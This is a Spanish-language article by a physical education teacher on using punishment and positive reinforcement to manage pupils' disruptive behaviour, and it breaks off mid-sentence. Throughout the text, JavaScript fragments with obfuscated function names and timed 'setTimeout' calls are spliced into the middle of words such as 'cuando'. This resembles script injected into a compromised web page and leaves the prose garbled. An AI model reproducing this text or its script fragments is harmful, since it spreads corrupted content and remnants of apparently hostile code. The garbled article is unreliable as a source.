EL USO DEL CASTIGO PARA LA MODIFICACIÓN DE LA CONDUCTA EN LAS CLASES DE EDUCACIÓN FÍSICA PARTICULARMENTE

Autora: Milagros García Habernau

          Más que castigar se tendría que reforzar las conductas positivas que aparecen en el aula; pero, a veces, tenemos que usar este recurso porque es inevitable que surja algún comportamiento violento o improcedente.

          En mis primeros años de experiencia en las aulas, y más concretamente en los patios de recreo o en los gimnasios, no utilizaba bien el recurso del castigo para estimular los aprendizajes y reconducirles. Intentaba motivarles, estimulandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la adquisición de comportamientos aceptables, hablándoles de buenas maneras. Mi fallo era pronunciar el nombre cariñosamente al llamarle la atención a algún alumno (también es cierto que no solo cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando intentaba que cambiaran de conducta les hablaba así): eso era como un refuerzo para él, le había ayudado a ganar en sus aspiraciones de hacerse ver; lo que estaba haciendo en realidad era potenciar el comportamiento que no deseaba que tuviera.

          Aunque, a veces, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando tenían comportamientos negativos, los castigaba de pie en la pared, quedándolos sin actividad física. No obstante, he comprobado que, en ocasiones esto no da resultado, porque, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando están castigados, hablan, juegan con otros o incluso otros  hacen gracia  a los demás y todo esto hace que, en vez de parecer un castigo (que debería ser algo incómodo para que estén  dispuestos a cambiar) sea algo agradable,  por lo que, de esta form,a se potencia el comportamiento que deseaba inhibirse. Además, así también se habitúan  a ser castigados y poco les importan repetir.

          Normalmente, las estrategias para la modificación del comportamiento consisten en resoluciones rápidas de dichos problemas (castigos tales como estar en la pared) que no profundizan en el problema, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en realidad lo que hay que hacer es, una vez que se han producido problemas en la conducta de los alumnos, para mejorar estos aspectos, tener en cuenta las siguientes indicaciones. (No solo para que haya un buen ambiente entre los alumnos y se siga el normal desarrollo de la clase, sino también para que el alumno se desarrolle como persona y conozca su comportamiento con respecto a los demás). Las estrategias para la modificación de comportamientos se pueden resumir en estos puntos:


          -Castigos a fin de inhibir el comportamiento no deseado.

          -Fomentar la sustitución de la conducta disruptiva por otros comportamientos más adaptados a normas  de manera que incentiven, más que castiguen. No es muy conveniente decir siempre las cosas negativas de un alumno, pues se refuerza más esta conducta. Por ejemplo, decir frases como “muy bien”, “así quiero que sigas”…

          -Convencer al alumno de la necesidad de cambiar su actuación, usandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}